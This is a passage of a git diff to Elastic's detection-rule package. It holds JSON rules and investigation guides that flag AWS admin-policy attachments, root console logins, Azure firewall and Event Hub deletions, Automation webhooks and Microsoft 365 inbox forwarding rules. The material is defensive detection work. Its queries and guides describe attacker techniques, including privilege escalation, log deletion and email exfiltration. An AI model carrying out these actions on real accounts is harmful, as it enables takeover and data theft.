\n- **Automation or compliance tasks.** \n Some environments use centralized scripts to attach `AdministratorAccess` temporarily. Validate through automation logs. \n\n### Response and remediation\n\n**1. Immediate containment**\n- Detach the policy from the affected group (`aws iam detach-group-policy`). \n- Review and limit group membership. Temporarily remove non-essential users or disable access for impacted accounts. \n- Rotate credentials for users who inherited admin privileges from the attachment. \n- Enable MFA on all impacted accounts. \n\n**2. Evidence preservation**\n- Export the triggering `AttachGroupPolicy` event and related CloudTrail entries \u00b130 minutes from the alert. \n- Preserve AWS Config and GuardDuty records to support forensic analysis. \n\n**3. Scoping and investigation**\n- Review additional IAM operations from the same caller (`CreateAccessKey`, `AttachRolePolicy`, `UpdateAssumeRolePolicy`). \n- Identify whether new groups or roles were created shortly before or after the event. \n- Check for subsequent API activity by newly privileged users (for example, S3, EC2, or IAM modifications). \n\n**4. Recovery and hardening**\n- Reinforce least privilege; avoid assigning `AdministratorAccess` to groups. \n- Use role-based access control with scoped permissions. \n- Enable CloudTrail, GuardDuty, and Security Hub across all regions. \n- Implement SCPs at the organization level to restrict direct `AdministratorAccess` attachments. \n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/):** response steps related to IAM policy modification and unauthorized privilege escalation. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/):** containment, analysis, and recovery guidance.\n- **AWS Documentation:** [AdministratorAccess Policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_job-functions.html#jf_administrator).\n", + "query": "iam where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"AttachGroupPolicy\"\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"policyArn=arn:aws:iam::aws:policy/AdministratorAccess\")\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachGroupPolicy.html", + "https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess.html", + "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "df919b5e-a0f6-4fd8-8598-e3ce79299e3b", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "df919b5e-a0f6-4fd8-8598-e3ce79299e3b_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_103.json b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_103.json deleted file mode 100644 index 1db32d5855b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_103.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective.", - "false_positives": [ - "Firewall policy deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Firewall policy deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Firewall Policy Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Firewall Policy Deletion\n\nAzure Firewall policies are crucial for managing and enforcing network security rules across Azure environments. Adversaries may target these policies to disable security measures, facilitating unauthorized access or data exfiltration. 
The detection rule monitors Azure activity logs for successful deletion operations of firewall policies, signaling potential defense evasion attempts by identifying specific operation names and outcomes.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by filtering for the operation name \"MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE\" and ensuring the event outcome is \"Success\".\n- Identify the user or service principal responsible for the deletion by examining the 'caller' field in the activity logs.\n- Check the timestamp of the deletion event to determine when the policy was deleted and correlate it with other security events or alerts around the same time.\n- Investigate the context of the deletion by reviewing any related activities performed by the same user or service principal, such as modifications to other security settings or unusual login patterns.\n- Assess the impact of the deletion by identifying which resources or networks were protected by the deleted firewall policy and evaluating the potential exposure or risk introduced by its removal.\n- Contact the responsible user or team to verify if the deletion was authorized and part of a planned change or if it was unexpected and potentially malicious.\n\n### False positive analysis\n\n- Routine maintenance or updates by authorized personnel can trigger the deletion event. Ensure that such activities are logged and verified by cross-referencing with change management records.\n- Automated scripts or tools used for infrastructure management might delete and recreate firewall policies as part of their operation. Identify these scripts and exclude their activity from alerts by using specific identifiers or tags.\n- Test environments often undergo frequent changes, including policy deletions. Consider excluding activity from known test environments by filtering based on resource group or subscription IDs.\n- Scheduled policy updates or rotations might involve temporary deletions. Document these schedules and adjust monitoring rules to account for these expected changes.\n- Ensure that any third-party integrations or services with permissions to modify firewall policies are accounted for, and their actions are reviewed and whitelisted if necessary.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure resources to prevent further unauthorized access or data exfiltration. This can be done by applying restrictive network security group (NSG) rules or using Azure Security Center to quarantine resources.\n- Review Azure activity logs to identify the user or service principal responsible for the deletion. 
Verify if the action was authorized and investigate any suspicious accounts or credentials.\n- Restore the deleted firewall policy from backups or recreate it using predefined templates to ensure that network security rules are reinstated promptly.\n- Implement conditional access policies to enforce multi-factor authentication (MFA) for all users with permissions to modify or delete firewall policies, reducing the risk of unauthorized changes.\n- Escalate the incident to the security operations team for further investigation and to determine if additional resources or systems have been compromised.\n- Conduct a post-incident review to identify gaps in security controls and update incident response plans to address similar threats in the future.\n- Enhance monitoring by configuring alerts for any future attempts to delete or modify critical security policies, ensuring rapid detection and response to potential threats.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/firewall-manager/policy-overview" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e02bd3ea-72c6-4181-ac2b-0f83d17ad969", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Network Security Monitoring", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "e02bd3ea-72c6-4181-ac2b-0f83d17ad969_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_103.json b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_103.json deleted file mode 100644 index 27161d64393..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_103.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection.", - "false_positives": [ - "Event Hub deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. 
Event Hub deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Event Hub Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Event Hub Deletion\n\nAzure Event Hub is a scalable data streaming platform and event ingestion service, crucial for processing large volumes of data in real-time. Adversaries may target Event Hubs to delete them, aiming to disrupt data flow and evade detection by erasing evidence of their activities. The detection rule monitors Azure activity logs for successful deletion operations, flagging potential defense evasion attempts by identifying unauthorized or suspicious deletions.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking the operation name \"MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE\" and ensure the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Investigate the context of the deletion by reviewing recent activities performed by the identified user or service principal to determine if there are any other suspicious actions.\n- Check for any recent changes in permissions or roles assigned to the user or service principal to assess if the deletion was authorized or if there was a potential privilege escalation.\n- Correlate the deletion event with other security alerts or incidents in the environment to identify if this action is part of a larger attack pattern or campaign.\n- Communicate with relevant stakeholders or teams to verify if the deletion was part of a planned operation or maintenance activity.\n\n### False positive analysis\n\n- Routine maintenance or updates by authorized personnel can trigger deletion logs. Verify if the deletion aligns with scheduled maintenance activities and exclude these operations from alerts.\n- Automated scripts or tools used for managing Azure resources might delete Event Hubs as part of their normal operation. Identify these scripts and whitelist their activity to prevent false positives.\n- Test environments often involve frequent creation and deletion of resources, including Event Hubs. Exclude known test environments from monitoring to reduce noise.\n- Changes in organizational policies or restructuring might lead to legitimate deletions. Ensure that such policy-driven deletions are documented and excluded from alerts.\n- Misconfigured automation or deployment processes can inadvertently delete Event Hubs. Regularly review and update configurations to ensure they align with intended operations and exclude these from alerts if verified as non-threatening.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Event Hub namespace to prevent further unauthorized deletions or modifications. 
This can be done by restricting access through Azure Role-Based Access Control (RBAC) and network security groups.\n- Review and revoke any suspicious or unauthorized access permissions associated with the deleted Event Hub. Ensure that only authorized personnel have the necessary permissions to manage Event Hubs.\n- Restore the deleted Event Hub from backups if available, or reconfigure it to resume normal operations. Verify the integrity and completeness of the restored data.\n- Conduct a thorough audit of recent Azure activity logs to identify any other unauthorized actions or anomalies that may indicate further compromise.\n- Escalate the incident to the security operations team for a detailed investigation into the root cause and to assess the potential impact on other Azure resources.\n- Implement additional monitoring and alerting for Azure Event Hub operations to detect and respond to similar unauthorized activities promptly.\n- Review and update security policies and access controls for Azure resources to prevent recurrence, ensuring adherence to the principle of least privilege.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about", - "https://azure.microsoft.com/en-in/services/event-hubs/", - "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-features" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "e0f36de1-0342-453d-95a9-a068b257b053", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "e0f36de1-0342-453d-95a9-a068b257b053_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_212.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_212.json new file mode 100644 index 00000000000..a0cc4b41a50 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_212.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a successful login to the AWS Management Console by the Root user.", + "false_positives": [ + "It's strongly recommended 
that the root user is not used for everyday tasks, including the administrative ones. Verify whether the IP address, location, and/or hostname should be logging in as root in your environment. Unfamiliar root logins should be investigated immediately. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "event.action", + "event.outcome", + "aws.cloudtrail.console_login.additional_eventdata.mfa_used", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Management Console Root Login", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS Management Console Root Login\n\nThe AWS root user is the original identity with unrestricted privileges over every resource in the account. Because it bypasses IAM boundaries and carries irreversible privileges, any successful root console login should be treated as a critical security event. AWS explicitly recommends locking away the root credentials and only using them for a small number of account-level administrative tasks (for example, closing an account, modifying support plans, or restoring MFA). See [Tasks that require the root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root).\n\nThis rule detects a successful AWS Management Console login by the root user (`ConsoleLogin` events with `userIdentity.type: Root` and `event.outcome: Success`).\n\n#### Possible investigation steps\n\n- **Confirm legitimacy.** \n Contact the designated root credential custodian or account owner to verify whether this login was expected and approved. Root access should only occur under documented change-control conditions.\n- **Review contextual event details.** \n Examine the CloudTrail fields in the alert:\n - `source.ip` \u2013 does it match known corporate IPs or expected admin VPNs? \n - `user_agent.original` \u2013 browser or automation? \n - `geo fields` \u2013 consistent with normal operations? \n - `@timestamp` \u2013 within a planned maintenance window?\n- **Check for prior or subsequent root activity.** \n Query CloudTrail for the last 30\u201390 days for any other root logins or root-initiated API calls. Multiple or recent root logins can indicate credential misuse.\n- **Correlate follow-on actions.** \n Look for risky API calls immediately after the login, such as:\n - `CreateUser`, `CreateAccessKey`, `AttachRolePolicy`, `PutBucketPolicy`, `UpdateAssumeRolePolicy`, `DeleteTrail`, or `StopLogging`. \n These actions may indicate persistence or cover-up attempts.\n- **Cross-account verification.** \n If the root user is federated through AWS Organizations or linked accounts, confirm no simultaneous logins occurred elsewhere.\n\n### False positive analysis\n\n- **Planned administrative actions.** \n Some rare maintenance tasks require root credentials (for example, payment method updates). 
If the login aligns with documented change control and was performed using MFA by the approved owner, the alert can be closed as benign.\n- **Third-party managed account scenarios.** \n Managed service providers may log in as root during onboarding or support activities. Confirm via ticketing or contractual documentation.\n\n### Response and remediation\n\n> The AWS Incident Response Playbooks classify root logins as **Priority-1 events** due to full-environment control. Follow these steps whether or not you have a dedicated IR team.\n\n**1. Immediate verification and containment**\n- If the login was not authorized or cannot be confirmed quickly: \n - Reset the root password using the AWS Management Console. \n - Rotate or remove any root access keys (root keys should normally not exist). \n - Ensure MFA is enabled and enforced on the root account. \n - Notify your security operations or cloud governance team.\n\n**2. Evidence preservation**\n- Export the alert\u2019s CloudTrail record and all subsequent events for 1 hour after the login. \n Store them in a restricted, immutable S3 evidence bucket. \n- Retain related GuardDuty findings, AWS Config history, and CloudTrail logs for the same period.\n\n**3. Scope and investigation**\n- Review additional events under the same `source.ip` to detect resource creation, IAM changes, or billing actions. \n- Inspect newly created users, roles, or keys since the login time to identify potential persistence mechanisms. \n- Check for any disabled or deleted CloudTrail trails, Security Hub findings suppression, or logging configuration changes.\n\n**4. Recovery and hardening**\n- Confirm MFA is working and only the authorized owner can access the root credentials. \n- Store root credentials in an offline vault under dual-custody control. \n- Enable organization-wide CloudTrail, GuardDuty, and Security Hub across all regions. \n- Implement policy and automation to alert on any future `userIdentity.type: Root` logins in real time. \n- Conduct a short post-incident review to update root-access procedures and reinforce least-privilege IAM practices.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/tree/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks):** See \u201cAccount Compromise\u201d and \u201cCredential Compromise\u201d playbooks for containment and recovery procedures. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs):** Reference \u201cAccount Access Investigation\u201d for evidence handling and credential rotation steps. \n- **AWS Documentation:** [Tasks that require the root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). 
\n\n", + "query": "event.dataset:aws.cloudtrail and \nevent.provider:signin.amazonaws.com and \nevent.action:ConsoleLogin and \naws.cloudtrail.user_identity.type:Root and \nevent.outcome:success\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2a67480-3b79-403d-96e3-fdd2992c50ef", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Sign-In", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 212 + }, + "id": "e2a67480-3b79-403d-96e3-fdd2992c50ef_212", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e3bd85e9-7aff-46eb-b60e-20dfc9020d98_3.json b/packages/security_detection_engine/kibana/security_rule/e3bd85e9-7aff-46eb-b60e-20dfc9020d98_3.json index e66ebfd9439..fed755cdf8a 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3bd85e9-7aff-46eb-b60e-20dfc9020d98_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e3bd85e9-7aff-46eb-b60e-20dfc9020d98_3.json @@ -19,6 +19,12 @@ "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 73, "rule_id": "e3bd85e9-7aff-46eb-b60e-20dfc9020d98", "setup": "#### Required Azure Entra Sign-In Logs\nThis rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. 
In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62_103.json b/packages/security_detection_engine/kibana/security_rule/e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62_103.json deleted file mode 100644 index 15e269c9592..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62_103.json +++ /dev/null @@ -1,64 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Webhook Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Automation Webhook Created\n\nAzure Automation webhooks enable automated task execution via HTTP requests, integrating with external systems. Adversaries may exploit this by creating webhooks to trigger runbooks with harmful scripts, maintaining persistence. The detection rule identifies webhook creation events, focusing on specific operation names and successful outcomes, to flag potential misuse in cloud environments.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal that initiated the webhook creation by examining the `event.dataset` and `azure.activitylogs.operation_name` fields.\n- Check the associated runbook linked to the created webhook to determine its purpose and inspect its content for any potentially malicious scripts or commands.\n- Investigate the source IP address and location from which the webhook creation request originated to identify any unusual or unauthorized access patterns.\n- Verify the legitimacy of the webhook by contacting the owner of the Azure Automation account or the relevant team to confirm if the webhook creation was expected and authorized.\n- Assess the broader context of the activity by reviewing recent changes or activities in the Azure Automation account to identify any other suspicious actions or configurations.\n\n### False positive analysis\n\n- Routine webhook creations for legitimate automation tasks can trigger false positives. Review the context of the webhook creation, such as the associated runbook and its purpose, to determine if it aligns with expected operations.\n- Frequent webhook creations by trusted users or service accounts may not indicate malicious activity. Consider creating exceptions for these users or accounts to reduce noise in alerts.\n- Automated deployment processes that involve creating webhooks as part of their workflow can be mistaken for suspicious activity. 
Document these processes and exclude them from triggering alerts if they are verified as safe.\n- Integration with third-party services that require webhook creation might generate alerts. Verify these integrations and whitelist them if they are part of approved business operations.\n- Regularly review and update the list of exceptions to ensure that only verified non-threatening behaviors are excluded, maintaining the effectiveness of the detection rule.\n\n### Response and remediation\n\n- Immediately disable the suspicious webhook to prevent further execution of potentially harmful runbooks.\n- Review the runbook associated with the webhook for any unauthorized or malicious scripts and remove or quarantine any identified threats.\n- Conduct a thorough audit of recent changes in the Azure Automation account to identify any unauthorized access or modifications.\n- Revoke any compromised credentials and enforce multi-factor authentication (MFA) for all accounts with access to Azure Automation.\n- Notify the security team and relevant stakeholders about the incident for further investigation and to ensure awareness of potential threats.\n- Implement enhanced monitoring and alerting for webhook creation and execution activities to detect similar threats in the future.\n- Document the incident, including actions taken and lessons learned, to improve response strategies and prevent recurrence.", - "query": "event.dataset:azure.activitylogs and\n azure.activitylogs.operation_name:\n (\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/ACTION\" or\n \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/WRITE\"\n ) and\n event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://www.ciraltos.com/webhooks-and-azure-automation-runbooks/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "e9ff9c1c-fe36-4d0d-b3fd-9e0bf4853a62_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_207.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_207.json deleted file mode 100644 index c90bb49b01b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_207.json +++ /dev/null @@ -1,117 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Gary Blackwell", - "Austin Songer" - ], - "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. 
Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", - "false_positives": [ - "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Inbox Forwarding Rule Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Inbox Forwarding Rule Created\n\nMicrosoft 365 allows users to create inbox rules to automate email management, such as forwarding messages to another address. While useful, attackers can exploit these rules to secretly redirect emails, facilitating data exfiltration. The detection rule monitors for the creation of such forwarding rules, focusing on successful events that specify forwarding parameters, thus identifying potential unauthorized email redirection activities.\n\n### Possible investigation steps\n\n- Review the event details to identify the user account associated with the creation of the forwarding rule by examining the o365.audit.Parameters.\n- Check the destination email address specified in the forwarding rule (ForwardTo, ForwardAsAttachmentTo, or RedirectTo) to determine if it is an external or suspicious address.\n- Investigate the user's recent activity logs in Microsoft 365 to identify any unusual or unauthorized actions, focusing on event.dataset:o365.audit and event.provider:Exchange.\n- Verify if the user has a legitimate reason to create such a forwarding rule by consulting with their manager or reviewing their role and responsibilities.\n- Assess if there have been any recent security incidents or alerts related to the user or the destination email address 